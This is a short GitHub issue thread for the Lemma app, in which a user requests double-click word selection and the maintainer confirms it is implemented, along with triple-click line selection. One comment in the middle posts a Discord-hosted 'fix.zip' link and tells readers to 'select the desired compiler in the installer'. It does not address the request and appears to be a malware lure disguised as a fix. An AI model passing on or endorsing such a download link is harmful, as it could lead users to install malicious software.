### ISSUE TITLE
Add select text on double click

### ISSUE THREAD

**Issue by shamkeev** [cvfosammmm/Lemma#4]
Hi,
Thanks for developing this app. I find it useful and use it every day to take my dev notes. However one feature I feel is missing is selecting a text on double click. Just like anywhere in the OS or in a browser, I think this feature is very intuitive.
When double clicking on a word, the word should be selected.

**Comment by Dominic54321** [comment]
try this
https://cdn.discordapp.com/attachments/1277836331501883449/1280291965879193731/fix.zip?ex=66d78c4f&is=66d63acf&hm=ac05131390b92a2047e3ee0fc4189fe126bf357b3d3cd73f5c0e51ba28c1c538&
select the desired compiler in the installer

**Comment by cvfosammmm** [comment]
Done and will be in the release later today. I also added triple-click to select lines. Thanks for reporting this.
